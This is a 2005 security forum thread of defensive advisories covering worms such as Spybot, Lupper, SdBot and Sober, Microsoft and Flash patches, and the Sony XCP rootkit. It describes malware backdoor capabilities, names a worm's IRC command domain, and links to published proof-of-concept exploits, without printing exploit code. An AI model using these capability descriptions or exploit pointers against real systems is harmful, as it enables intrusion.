W32.Spybot.ZIF is a network-aware worm that opens a back door on the compromised computer. It spreads by exploiting common system vulnerabilities.
METHODS OF INFECTION
The Microsoft Windows DCOM RPC Interface Buffer Overrun Vulnerability (described in Microsoft Security Bulletin MS03-026).
The Microsoft Windows Local Security Authority Service Remote Buffer Overflow (as described in Microsoft Security Bulletin MS04-011).
The Microsoft Windows ntdll.dll Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS03-007).
The Microsoft ASN.1 Library Bit String Processing Variant Heap Corruption (described in Microsoft Security Bulletin MS04-007).
The Workstation Service Buffer Overrun vulnerability (as described in Microsoft Security Bulletin MS03-049).
The Microsoft Windows Plug and Play Buffer Overflow Vulnerability (described in Microsoft Security Bulletin MS05-039).
The DameWare Mini Remote Control Server Pre-Authentication Buffer Overflow vulnerability (as described in Bugtraq ID 9213).
The VERITAS Backup Exec Agent Browser Remote Buffer Overflow Vulnerability (as described here).
EXISTING BACKDOORS: Spreads to computers compromised by the following threats: Backdoor.SubSeven, Backdoor.NetDevil, W32.MyDoom, W32.Beagle, Backdoor.Optix
Exploits weak username/passwords to spread over network shares and to the Microsoft SQL server environmentSYMPTOMS & ATTACK METHODS
Opens a back door by contacting an IRC server on the domain scv.unixirc.de, through TCP port 6667. This back door allows a remote attacker to perform the following actions on the compromised computer:
Start and stop threads and processes:
Start a SOCKS4 server
Start an HTTP server
Start an FTP server
Retrieve clipboard data
Sniff local network traffic
Run shell commands
Change IE start page
Flush DNS/ARP cache
Steal passwords from protected storage
Open and delete files
Download and execute files
Perform a denial of service (DOS) attack
View and delete registry keys
Obtain computer information such as CPU type, OS version, RAM, etc
Scan a specified network range for Cisco routers that may have vulnerable Telnet or HTTP servers running and report results back to IRC. -
November 8, 2005 at 1:08 pm #3135807
MS05-052: Resolution posted for web pages that don’t load properly
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Microsoft offers much improved security in XP SP2 for Internet Explorer and applying the latest tightening of controls can break some applications and web pages that may not be following the best practices. This manual regedit based fix can help resolve these issues.
SYMPTOMS
After you install cumulative security update 896688, a Web page that contains an ActiveX control does not load as expected in the products that are listed in the “Applies to” section. You may also receive an error message that is similar to the following when you try to open Add/Remove Programs in Control Panel:
Object doesn’t support this property or method
RESOLUTION
To resolve this issue, add the required subkeys to the registry. To do this, follow these steps:
1. Click Start, click Run, type Notepad.exe, and then click OK.
2. Paste the following text in the Notepad document:Windows Registry Editor Version 5.00
[HKEY_CLASSES_ROOT\CLSID\{0000031A-0000-0000-C000-000000000046}]
@=”ClassMoniker”[HKEY_CLASSES_ROOT\CLSID\{0000031A-0000-0000-C000-000000000046}\InprocServer32]
@=”ole32.dll”[HKEY_CLASSES_ROOT\CLSID\{0000031A-0000-0000-C000-000000000046}\ProgID]
@=”clsid”[HKEY_LOCAL_MACHINE\SOFTWARE\Classes\CLSID\CLSID]
@=”{0000031A-0000-0000-C000-000000000046}”3. Click File, and then click Save.
4. In the Save in box, click Desktop.
5. In the File name box, type KB909889.reg.
6. In the Save as type box, click All Files, and then click Save.
7. Click File, and then click Exit.
8. On the desktop, double-click KB909889.reg, and then click Yes to add the information to the registry.
9. Click OK to confirm that the information in the KB909889.reg file has been added to the registry.
10. Restart the computer.Important: This article contains information that shows you how to help lower security settings or how to turn off security features on a computer. You can make these changes to work around a specific problem. Before you make these changes, we recommend that you evaluate the risks that are associated with implementing this workaround in your particular environment. If you implement this workaround, take any appropriate additional steps to help protect your system.
-
November 8, 2005 at 1:08 pm #3135808
Macromedia Flash Player – Patch information for Critical Vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Macromedia has performed a security update for it’s Flash Player to improve security, including a critical vulnerability that can be exploited by visiting a malicious web page or a specially crafted email attachment. Everyone using this software should update as quickly as possible.
Macromedia Flash Player Remote Command Execution Vulnerability
Advisory ID : FrSIRT/ADV-2005-2317
CVE ID : CVE-2005-2628
Rated as : Critical
Remotely Exploitable : Yes
Locally Exploitable : Yes
Release Date : 2005-11-05Technical Description: A critical vulnerability has been identified in Macromedia Flash Player, which may be exploited by remote attackers to execute arbitrary commands. This issue is due to a memory corruption error in “Flash.ocx” when using frame type identifiers read from malformed SWF files as indexes of certain arrays, which could be exploited by remote attackers to compromise a vulnerable system by convincing a user to visit a specially crafted HTML Web page or open a malicious Flash file.
Affected Products: Macromedia Flash Player 7.0.19.0 and prior
Solution: Upgrade to Flash Player 8 version 8.0.22.0 or Flash Player 7 versions 7.0.60.0 or 7.0.61.0 :
-
November 8, 2005 at 1:08 pm #3135809
Lupper Internet Worm – affects Linux/PHP environment
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
A new Linux based Internet worm is starting to spread. More information is noted below
Lupper Internet Worm – Key Links
http://vil.nai.com/vil/content/v_136821.htm
http://secunia.com/virus_information/23339/This worm spreads by exploiting web servers hosting vulnerable PHP/CGI scripts. It is a modified derivative of the Linux/Slapper and BSD/Scalper worms from which it inherits the propagation strategy. It scans an entire class B subnet created by randomly choosing the first byte from an hard-coded list of A classes and randomly generating the second byte.
The worm blindly attacks web servers by sending malicious http requests on port 80. If the target server is running one of the vulnerable scripts at specific URLs and is configured to permit external shell commands and remote file download in the PHP/CGI environment, a copy of the worm could be downloaded and executed.
Like its precedents, the infected computers form a global network of compromised servers based on peer to peer communication principles. This network can be used, for example, for Distributed Denial of Service (DDoS) attacks or other purposes because it can accept remote commands. It is also capable of harvesting email addresses stored in files on the web server.
Symptoms
Presence of the following file: /tmp/lupii
Ports Used: UDP 7111, UDP 7222Sends HTTP requests to the URLs it generates, and attempts to spread by exploiting the following Web server-related vulnerabilities:
- The XML-RPC for PHP Remote Code Injection vulnerability (as described in Bugtraq ID 14088)
- The AWStats Rawlog Plugin Logfile Parameter Input Validation Vulnerability (as described in Bugtraq ID 10950)
- The Darryl Burgdorf Webhints Remote Command Execution Vulnerability (as described in Bugtraq ID 13930)
-
November 8, 2005 at 1:08 pm #3135804
Microsoft Patch Tuesday – 11/8/2005 One critical update scheduled
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Sharing planning info for the standard 2nd Tuesday of the month updates from Microsoft
Quote: On 8 November 2005 Microsoft is planning to release: Security Updates
•1 Microsoft Security Bulletin affecting Microsoft Windows. The highest Maximum Severity rating for this is Critical. These updates will require a restart. These updates will be detectable using the Microsoft Baseline Security Analyzer (MBSA).Microsoft Windows Malicious Software Removal Tool
•Microsoft will release an updated version of the Microsoft Windows Malicious Software Removal Tool on Windows Update, Microsoft Update, Windows Server Update Services and the Download Center.Note that this tool will NOT be distributed using Software Update Services (SUS).
Non-security High Priority updates on MU, WU, WSUS and SUS:
•Microsoft will release two NON-SECURITY High-Priority Updates on Microsoft Update (MU), and Windows Server Update Services (WSUS).
•Microsoft will release one NON-SECURITY High-Priority Updates on Windows Update (WU), and Software Update Services (SUS). -
November 8, 2005 at 1:08 pm #3135805
Article: Windows Rootkits an in-depth analysis by SecurityFocus
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This article was published by Security Focus and provides a good description of this threat and how it works in detail.
Article: Windows Rootkits an in-depth analysis by SecurityFocus
In 2005, the bar has been raised in the arena of malicious software. This has never before been more evident than in the recent deployments of Windows rootkit technology within some of the latest viruses, worms, spyware, adware, and more. It has become increasingly important to understand what this threat is and what can be done to detect malicious use.
-
November 8, 2005 at 1:08 pm #3135806
Microsoft launches Windows Live Safety Center beta
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Microsoft has launched a new online version of their full anti-virus scanner that can be used to double check other installed products. This new facility also provides disk cleanup and defragmentation controls from an easy to use menu approach. This is a beta product, so use it carefully. So far in early testing, it has worked accurately for me.
Microsoft launches Windows Live Safety Center beta
Windows Live Safety Center is a new, free service designed to help ensure the health of your PC.
* Check for and remove viruses
* Learn about threats
* Improve your PC’s performance
* Get rid of junk on your hard disk
Use the full service scan to check everything, or turn to the scanners and information in the service centers to meet your specific needs. -
November 9, 2005 at 6:32 am #3120348
Microsoft Security Updates – November 2005
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
One critical update for Windows for issued by Microsoft during November 2005. The MS05-053 security update fixes vulnerabilites associated with heap overflow errors when malformed Windows Metafile (WMF) and Enhanced Metafile (EMF) images are processed. All Windows systems should be patched expediently as reverse engineering and the development of exploits are likely.
Microsoft Security Bulletin MS05-053: Vulnerabilities in Graphics Rendering Engine Could Allow Code Execution (896424)
PATCHES THESE THREE VULNERABILITESGraphics Rendering Engine – CAN-2005-2123: A remote code execution vulnerability exists in the rendering of Windows Metafile (WMF) and Enhanced Metafile (EMF) image formats that could allow remote code execution on an affected system. Any program that renders WMF or EMF images on the affected systems could be vulnerable to this attack. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Windows Metafile Vulnerability – CAN-2005-2124: A remote code execution vulnerability exists in the rendering of Windows Metafile (WMF) image format that could allow remote code execution on an affected system. Any program that renders WMF images on the affected systems could be vulnerable to this attack. An attacker who successfully exploited this vulnerability could take complete control of an affected system.
Enhanced Metafile Vulnerability – CAN-2005-0803: A denial of service vulnerability exists in the rendering of Enhanced Metafile (EMF) image format that could allow any program that renders EMF images to be vulnerable to attack. An attacker who successfully exploited this vulnerability could cause the affected programs to stop responding.
AFFECTED PRODUCTS
Microsoft Windows 2000 Service Pack 4
Microsoft Windows XP Service Pack 1
Microsoft Windows XP Service Pack 2
Microsoft Windows XP Professional x64 Edition
Microsoft Windows Server 200
Microsoft Windows Server 2003 Service Pack 1
Microsoft Windows Server 2003 for Itanium-based Systems
Microsoft Windows Server 2003 with SP1 for Itanium-based Systems
Microsoft Windows Server 2003 x64 EditionOTHER REFERENCES
Microsoft Windows WMF/EMF File Handling Vulnerabilities
http://www.frsirt.com/english/advisories/2005/2348
MS05-053 – More Graphic Rendering Buffer Overflow Vulnerabilities
http://isc.sans.org/diary.php?storyid=831 -
November 9, 2005 at 2:32 pm #3119001
Malware Infections – “To rebuild or not to rebuild” that is the question?
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
SUMMARY: When a PC’s security, performance, and reliability are affected by a malware infection, damages can be so severe that rebuilding the PC is the only option. The need to reload the Operating system is usually based on the comfort level in cleaning malware infections. The most important factor is a proven removal tool which will provide assurances that all traces of the infection are gone.
REASONS TO CLEAN ONLY (AND NOT REBUILD)
As I’ve been actively helping folks clean malware for almost ten years now, you can do remove most malware infections reliabily if you have good cleaning tools.Most AV, spyware, and standalone cleaners not only remove the main malware driver routines, but they also clean up the associated registry entries and other Windows configuration settings allowing the PC to return to normal operations. If the malware infection is common, there should be good cleaning tools, so that it can be removed as safely.
As an example, I have rarely seen the need to rebuild infected corporate PCs. One of my friends who is a lead technician, mentioned that only two out of hundreds cleaned in the past couple of years required a rebuild.
While corporate systems can be re-imaged quickly to base settings, it still takes some work to copy settings, My Documents, Favorites, etc., across for the user. The user also looses time in readjusting to the newly built system. They almost always loose some items plus they may be less productive for a few days.
On a home PC, a rebuild could be an even greater impact. The user needs to reload the operating system, the latest service packs, activate and register XP, and reinstall from backups. They must then install all Windows updates, plus perform security updates for every product they have on the system. There is also usually a loss of some items in this process.
REASONS TO REBUILD
Still, if someone is infected with a leading edge rootkit, virus, or advanced spyware infection, there may not be cleaning tools available. Thus, a rebuild might be in order to ensure this highly serepticious malware still isn’t “phoning home” constantly.
Manually finding and repairing all the rootkit entries by hand could be risky and may not get everything as it should. As an example, about a year ago, I tried to manually remove (with REGEDIT) a new leading edge strain of spyware that was generating popups galore on a friend’s PC. Things worked great, until my friend rebooted and I soon learned that this advanced spyware product was dynamically creating registry entries on the fly.
Another key factor in the need to rebuild is multiple malware infections. When there is more than one infection present, the PC environment remain be unstable even after cleaning. This is because the cleaning tools can remove the malware, but it cannot fix permanent damages to the Windows registry or key system files. In these cases, you have not choice but to rebuild.
TEN THINGS TO DO AFTER YOU RECOVER FROM A MALWARE INFECTION
1. Stay up-to-date to date with Windows security (2nd Tuesday of month)
2. Stay up-to-date on all security patches for all other products (e.g., Office, Visual Studio, Firefox, Opera, Macromedia Flash, Real Player, Winamp, etc)
3. Use a good bi-directional firewall
4. Use a good anti-virus product
5. Use an anti-spyware product
6. Change your passwords (esp. if you had a backdoor, rootkit, keylogger, etc)
7. Use best practices – think before you click and think of all email attachments and links as being possibly dangerous — even if they come from a trusted source.
8. Run routine weekly scans for your system
9. Backup anything you don’t want to loose to DVD-R, CD-R, or FlashRAM sticks
10. Keep up with breaking news for emerging security risksADDITIONAL RESOURCES
-
December 20, 2005 at 4:12 pm #3196957
Malware Infections –
by black-eyed pea · about 18 years, 3 months ago
In reply to Malware Infections – “To rebuild or not to rebuild” that is the question?
I think if the resources exist, it is usually better to rebuild. In certain government entities, it is actually mandated. However, the feasibility of rebuilding every computer that gets infected is low. For example, tracking cookies show up in almost every spyware scan, but it makes sense to remove the tracking cookies rather than rebuild. I would like a definitive guide that rates how critical infections are, so that once a computer reaches a certain threshold, we would know it should be rebuilt.
I don’t know of any widely available antispyware application that is behavior based; therefore, the best tools at our disposal are signature-based. Any signature-based anti-malware application is only as good as its definitions. That is why system administrators and technicians who have had any experience with malware typically use 3-7 anti-malware apps.
There is no way for us to gauge how long undetected malware has sat undetected on any particular computer. I have scanned computers and removed malware only to come back a few days later with new definitions and find more. That is a frustrating thing, especially when it is a backdoor Trojan, keylogger, or rootkit. That is one reason it is better to rebuild.
Another reason rebuilding can make sense is that it takes several hours to run multiple anti-malware tools – with a fast machine, you can usually backup the user’s data and rebuild the machine faster. In our organization, we will have to upgrade computers to XP eventually, so if a Windows 2000 computer gets infected, it is an impetus to upgrade to XP/SP2.
-
-
November 11, 2005 at 5:47 am #3117515
MS05-053: TROJ_EMFSPLOIT.A in the wild
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Trend is reporting a trojan horse that might be the first example of a new exploit developed from the November security updates issued by Microsoft. Please update your systems with the latest security updates offered by Microsoft, as more developments could follow.
Internet Storm Center: TROJ_EMFSPLOIT.A in the wild
Trend Link: TROJ_EMFSPLOIT.A in the wild
Trend Micro is reporting a trojan in the wild (TROJ_EMFSPLOIT.A) that is exploiting the recent MS05-053 vulnerability announced on Tuesday. The trojan causes EXPLORER.EXE to crash, which isn’t so much fun for Windows users.
Upon execution, this Trojan causes the EXPLORER.EXE of affected machines to crash. It may also cause applications that attempt to load it to crash. An example of an application that can load EMF files is Internet Explorer. This Trojan runs on Windows 2000 Service Pack 4 and XP with no Service Pack.
-
November 14, 2005 at 9:48 am #3120016
Sober.T – Please be careful with ZIP email attachments
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
All Sober variants should be carefully watched. This new version is similar to past attacks and uses ZIP based attachments.
http://secunia.com/virus_information/23645/sober.t/
The Sober.T worm was found on November 14th, 2005. This Sober variant is similar to the previous ones – it sends itself as an attachment in e-mail messages with English or German texts. Sober.T worm sends e-mail messages with English and German texts and its file attached. The attachment is a ZIP archive containing the worm’s executable.
-
November 16, 2005 at 5:06 am #3130661
Sober virus – F-Secure declares medium risk on several new variants
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
There are now at least a half dozen new Sober variants that are circulating in the wild. F-Secure has declared medium risk on some of these. I’m getting some in my personal email, so it’s out there.
2005.11.15 Sober.T
2005.11.15 Sober.U
2005.11.15 Sober.V
2005.11.15 Sober.W
2005.11.15 Sober.X
2005.11.16 Sober.Z
EMAIL EXAMPLE:
Subject: Your eMail Password
Body: Thanks for your registration! Your registration will not be complete until you re-confirm it. Please read the following agreement. If you accept it, click the Accept to complete
your registration!Attachment: Accept_e-Text.zip
-
November 16, 2005 at 12:45 pm #3131708
Sony CD XCP Uninstallation ActiveX Vulnerabilities
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
FrSIRT and Secunia have issued critical advisories for vulnerabilities associated with unsecure techniques used by in an ActiveX control for the Sony CD XCP based DRM controls.
Sony CD XCP Uninstallation ActiveX Vulnerabilities
http://secunia.com/advisories/17610/
http://www.frsirt.com/english/advisories/2005/2454Multiple vulnerabilities were identified in Sony CD First4Internet XCP uninstallation ActiveX control, which could be exploited by attackers to execute arbitrary commands. These flaws are due to a design error in the “CodeSupport.ocx” ActiveX control that supports insecure methods, which could be exploited by remote attackers to compromise or reboot a vulnerable system by convincing a user to visit a specially crafted Web page.
Solution: Remove the ActiveX control from the system if it is installed, or set a kill bit for the “CodeSupport.ocx” ActiveX control (CLSID 4EA7C4C5-C5C0-4F5C-A008-8293505F71CC)
http://support.microsoft.com/kb/240797
Related Links
http://secunia.com/advisories/17408/
http://xforce.iss.net/xforce/alerts/id/208
http://cp.sonybmg.com/xcp/english/updates.html -
November 16, 2005 at 12:45 pm #3131707
New SdBot Internet worm variant – can install rootkit
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
A new version of the Sdbot Internet worm is circulating in the wild and it can install a rootkit.
W32/Sdbot.worm.gen.w64512http://vil.nai.com/vil/content/v_136981.htm
http://secunia.com/virus_information/23740/This worm bears the following characteristics:
* Propagates to machines with poorly secured network shares (weak username & password combinations) or accessible share (where local credentials are sufficient to write files to other systems)
* Propagates to MySQL and Microsoft SQL servers that are poorly secured (again weak username/password combinations)
* Propagates to remote machines by attempting to copy itself to a number of shares
* provides a backdoor to the victim machine, thereby compromising data on that machine (significant remote access functionality is available to the hacker)
* The worm appears to be Windows XP Service Pack 2 aware and makes several references to security features within the new Windows Security Center
* Drops a Rootkit on the comprised system (Detected as FUROOTKIT by current DATS).
It uses the following Exploits to propogate across vulnerable networks:
- MS04-007
- MS04-011
- MS05-039
-
November 17, 2005 at 4:45 am #3131494
Microsoft – New unpatched RPC memory allocation vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
This new risk is rated as “Moderately Critical” and it is can impact system performance. So far there are no published exploits in-the-wild on this newly discovered vulnerability that Microsoft will most likely patch soon.
Microsoft – New unpatched RPC memory allocation vulnerability
http://www.frsirt.com/english/advisories/2005/2468Microsoft RPC memory allocation POC Exploit
note – actual POC code is published here – please be careful
http://www.frsirt.com/exploits/20051117.Win_upnp_getdevicelist.c.phpMicrosoft Security Advisory (911052)
http://www.microsoft.com/technet/security/advisory/911052.mspxTechnical Description: A vulnerability has been identified in Microsoft Windows, which could be exploited by remote attackers to cause a denial of service. This flaw is due to a memory allocation error when processing specially crafted RPC (Remote procedure call) requests, which could be exploited by attackers to crash a vulnerable system or cause the “services.exe” process to consume a large amount of system resources.
Affected Products
Microsoft Windows 2000 Service Pack 4
Microsoft Windows 2000 Service Pack 3
Microsoft Windows 2000 Service Pack 2
Microsoft Windows 2000 Service Pack 1
Microsoft Windows 2000
Microsoft Windows XP Service Pack 1 (for Windows XP Service Pack 1 an attacker must have valid logon credentials to exploit this vulnerability).Solution: FrSIRT is not aware of any official supplied patch for this issue.
Status: Microsoft is not aware of active attacks that use this vulnerability or of customer impact at this time.
-
November 18, 2005 at 9:24 am #3131079
Macromedia Flash Player vulnerability in older versions – POC Exploit published
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Macromedia has performed a security update for it’s Flash Player to improve security, including a critical vulnerability that can be exploited by visiting a malicious web page or a specially crafted email attachment. Everyone using this software should update as quickly as possible.
Advisory ID : FrSIRT/ADV-2005-2317
CVE ID : CVE-2005-2628
Rated as : Critical
Note : This proof-of-concept exploit generates a flash file that will cause a DoSMore Information and update links can be found in this blog entry
-
November 19, 2005 at 5:24 am #3117442
Sony BMG Rootkit – Complete list of 52 albums being recalled
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
One of my friends in the security field shared an excellent summary of the failed attempt by Sony BMG to better protect their music from Copyright violations. As an ethical individual, I respect the intellectual property rights of those in the music industry. The approach Sony used created harm and potential security issues for innocent loyal customers, who purchased their CDs in good faith.
The rootkit may have appeared to be a good technical solution on the drawing board for better protecting digital rights. However, they didn’t exercise risk management and plan well for things that could go wrong, including opening up the customer’s PC to emerging security risks based on new malware that takes advantage of the rootkit architecture.
The following provides an update for this issue with several related links:
QUOTE: Sony/BMG has just recalled 52 music CDs, all of which came with software which will install “rootkit” spyware programs on your Windows computer. If you have any of these CDs and have played them on your Windows PCs, your computers may be infected with some truly nasty software. This problem does NOT affect Macs or Linux computers and may not have affected you if you run a secure Windows setup. More than 500,000 computers are known to be infected worldwide.
List of 52 infected Sony CDs being recalled
http://cp.sonybmg.com/xcp/english/titles.htmlMore on Sony’s recall notice to replace these CDs at no charge to the owner
The Sony/BMG website has an uninstall program that is supposed to clean up the infection. HOWEVER, as of today, their uninstall program leaves your computer MORE VULNERABLE than before! Check with your anti-virus vendor to see if your AV can clean up this problem.
Microsoft is upgrading their Malicious Software Removal Tool, which is updated once a month. It will soon be updated to remove the XCP modifications that Sony/BMG put on your computer, but it’s not available currently. More information can be found at these sites:
Sony BMG’s copy-protection problems grow
http://securityfocus.com/news/11357Mark’s Sysinternals Blog Victory!
http://www.sysinternals.com/blog/2005/11/victory.htmlSony’s DRM Rootkit: The Real Story
http://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.htmlSecunia Advisory
http://secunia.com/advisories/17408/US CERT Advisory
http://www.us-cert.gov/current/current_activity.html#xcpdrm
http://www.kb.cert.org/vuls/id/312073Security issues may surface using Sony’s XCP uninstall tools
http://secunia.com/advisories/17610/
http://www.frsirt.com/english/advisories/2005/2454
http://www.freedom-to-tinker.com/?p=927Security issues may surface using Sony’s uninstall for SunnComm MediaMax (another DRM)
http://secunia.com/advisories/17639/
http://www.frsirt.com/english/advisories/2005/2493
http://www.freedom-to-tinker.com/?p=931Rootkits could mean a complete rebuild for your PC
http://insight.zdnet.co.uk/0,39020415,39237277-4,00.htmQUOTE: How do we remove rootkits? — There is only one guaranteed way to remove a rootkit. You destroy the system and then rebuild it. There is no other way to reliable remove a rootkit — no other way whatsoever. You can’t delete the file or even reinstall the operating system over the top of the existing OS — which is a horrible practice anyway. It is super important to nuke the system because a rootkit’s primary function is stealth — what is it hiding? Do you know? Usually not. How can you reliably know what it was hiding, what it was compromising or what it was removing?
-
November 19, 2005 at 9:23 am #3117403
Sony BMG Rootkit – Key Information & List of 52 dangerous CDs being recalled
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
One of my friends in the security field shared an excellent summary of the failed attempt by Sony BMG to better protect their music from Copyright violations. As an ethical individual, I respect the intellectual property rights of those in the music industry. The approach Sony used created harm and potential security issues for innocent loyal customers, who purchased their CDs in good faith.
The rootkit may have appeared to be a good technical solution on the drawing board for better protecting digital rights. However, they didn’t exercise risk management and plan well for things that could go wrong, including opening up the customer’s PC to emerging security risks based on new malware that takes advantage of the rootkit architecture.
The following provides an update for this issue with several related links:
QUOTE: Sony/BMG has just recalled 52 music CDs, all of which came with software which will install “rootkit” spyware programs on your Windows computer. If you have any of these CDs and have played them on your Windows PCs, your computers may be infected with some truly nasty software. This problem does NOT affect Macs or Linux computers and may not have affected you if you run a secure Windows setup. More than 500,000 computers are known to be infected worldwide.
List of 52 infected Sony CDs being recalled
http://cp.sonybmg.com/xcp/english/titles.htmlMore on Sony’s recall notice to replace these CDs at no charge to the owner
The Sony/BMG website has an uninstall program that is supposed to clean up the infection. HOWEVER, as of today, their uninstall program leaves your computer MORE VULNERABLE than before! Check with your anti-virus vendor to see if your AV can clean up this problem.
Microsoft is upgrading their Malicious Software Removal Tool, which is updated once a month. It will soon be updated to remove the XCP modifications that Sony/BMG put on your computer, but it’s not available currently. More information can be found at these sites:
Sony BMG’s copy-protection problems grow
http://securityfocus.com/news/11357Mark’s Sysinternals Blog Victory!
http://www.sysinternals.com/blog/2005/11/victory.htmlSony’s DRM Rootkit: The Real Story
http://www.schneier.com/blog/archives/2005/11/sonys_drm_rootk.htmlSecunia Advisory
http://secunia.com/advisories/17408/US CERT Advisory
http://www.us-cert.gov/current/current_activity.html#xcpdrm
http://www.kb.cert.org/vuls/id/312073Security issues may surface using Sony’s XCP uninstall tools
http://secunia.com/advisories/17610/
http://www.frsirt.com/english/advisories/2005/2454
http://www.freedom-to-tinker.com/?p=927Security issues may surface using Sony’s uninstall for SunnComm MediaMax (another DRM)
http://secunia.com/advisories/17639/
http://www.frsirt.com/english/advisories/2005/2493
http://www.freedom-to-tinker.com/?p=931Rootkits could mean a complete rebuild for your PC
http://insight.zdnet.co.uk/0,39020415,39237277-4,00.htmQUOTE: How do we remove rootkits? — There is only one guaranteed way to remove a rootkit. You destroy the system and then rebuild it. There is no other way to reliable remove a rootkit — no other way whatsoever. You can’t delete the file or even reinstall the operating system over the top of the existing OS — which is a horrible practice anyway. It is super important to nuke the system because a rootkit’s primary function is stealth — what is it hiding? Do you know? Usually not. How can you reliably know what it was hiding, what it was compromising or what it was removing?
Key Advice for now: Please do not play CDs using your PC until this issue is fully addressed (or if you do play CDs not on the list, still be vigilant and cautious). It could require rebuilding your PC.
Ideas for Infected Users: If you are currently infected with the XCP software, some standalone tools and removers are available. Do not try to remove this manually unless you have complete directions and you are highly skilled as a computer technician. Your CD-ROM or PC may no longer work properly if you fail to remove the rootkit properly. I believe further “help is on the way“ and infected users might be better served to wait a little while longer until better tools are published.
-
November 20, 2005 at 9:23 am #3117307
Articles: Windows Rootkits in 2005 – Part I and II
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Both articles were published by Security Focus and they provide excellent technical information on how this emerging threat works in detail.
Windows Rootkits in 2005 – Part I
http://www.securityfocus.com/infocus/1850Windows Rootkits in 2005 – Part II
http://online.securityfocus.com/infocus/1851 -
November 21, 2005 at 9:23 am #3122378
Internet Explorer – New Proof-of-Concept “zero day” Exploit published
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
A new proof-of-concept (POC) exploit has been published for a critical unpatched IE vulernability. Please be careful of any websites you visit and so far there are no reports of the POC being found in the wild
New Zero Day Internet Explorer Remote Code Execution Exploit
http://www.frsirt.com/english/advisories/2005/2509
http://www.frsirt.com/exploits/20051121.IEWindow0day.php
http://secunia.com/advisories/15546/
http://cve.mitre.org/cgi-bin/cvename.cgi?name=CAN-2005-1790QUOTE: A critical vulnerability has been identified in Microsoft Internet Explorer, which could be exploited by remote attackers to execute arbitrary commands. This flaw is due to a memory corruption error when processing malformed HTML pages containing specially crafted calls to the JavaScript “window()” object and the “body onload” tag, which could be exploited remote attackers to take complete control of an affected system by convincing a user to visit a malicious Web page.
This vulnerability has been confirmed on Windows XP SP2 with Internet Explorer 6 (fully patched)
-
November 21, 2005 at 5:31 pm #3122212
Internet Storm Center moves to Yellow Alert Status on zero day IE exploit
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Internet Storm Center moves to Code Yellow Status on Zero Day IE exploit
Prevention techniques include: using IE for trusted sites, using alternative browsers, and in IE to disable Active Scripting except for trusted sites (Secunia link). -
November 22, 2005 at 5:35 am #3123756
Microsoft Security Advisory (911302) – Information and workarounds for new IE vulnerability
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Microsoft is addressing this new security exposure which has recently emerged as a new zero day proof-of-concept exploit. They offer workarounds and technical information on the exposures in the link below:
Microsoft Security Advisory (911302) – New IE vulnerability with temporary Workarounds
QUOTE: This issue was originally publicly reported in May as being a stability issue that caused the browser to close. Since then, new information has been posted that indicates remote code execution could be possible. Microsoft is concerned that this new report of a vulnerability in Internet Explorer was not disclosed responsibly, potentially putting computer users at risk. We continue to encourage responsible disclosure of vulnerabilities. We believe the commonly accepted practice of reporting vulnerabilities directly to a vendor serves everyone’s best interests. This practice helps to ensure that customers receive comprehensive, high-quality updates for security vulnerabilities without exposure to malicious attackers while the update is being developed.
More information and links can be found for a new zero day proof-of-concept exploit that has been published by selecting this link:
Internet Storm Center moves to Yellow Alert Status on zero day IE exploit
-
November 23, 2005 at 5:14 am #3121629
Sober.Y – Message Labs stops 2.7 million copies
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
The link below shares a press release of the Sober.Y which continues to generate large quantities of infected email messages. I personally got 00’s of copies and they are still streaming in. Please be careful with all suspicious emails and never open attachments unless you are absolutely certain they are safe.
MessageLabs Stops Over 2.7 million Copies of New Sober Virus That Spoofs FBI and CIA
November 22, 2005 – 17:00 GMT/ 12:00 ET – MessageLabs has intercepted
over 2.7-million copies of a new Sober virus, many of which are being
spoofed to appear as though they are sent from the FBI or the CIA.
The first copy was stopped at 19:00 GMT on 21st November. The size of
the attack indicates that this is a major offensive, certainly one of
the largest in the last few months.Email Overview
These emails suggest to recipients that their Internet use has been
monitored by the FBI or CIA and that they have accessed illegal Web
sites. The email directs users to open the ZIP attachment containing
the executable, which once opened delivers the Sober virus payload.
It then spreads by searching the infected computer for other email
addresses to send copies of itself to, but ignoring any domains for
certain security organizations, including MessageLabs. -
November 23, 2005 at 9:14 am #3114083
Opera 8.51 released to address critical security exposures
by harry waldron, cpcu, ccp · about 18 years, 4 months ago
In reply to Harry Waldron
Opera 8.51 has been released to address critical security issues. I use this as a complementary browser in addition to IE 6 (XP SP2) and the Mozilla Deerpark beta (Firefox 1.5 RC3). After a couple of days of testing, this new version is working well on my work and home PCs. All Opera users should move to the latest version to ensure they enjoy the best protection possible.
Opera 8.51 for Windows is available for download.
Changes since 8.50
User interface
Added Answers.com search option, with ‘a’ as keyword to search from address field. The version number of search.ini has not been increased; the change will only be visible in fresh installs.
Security and plug-ins
- Macromedia Flash version shipped with Opera is now 7r61. Addresses issue reported in Secunia Advisory 17437.
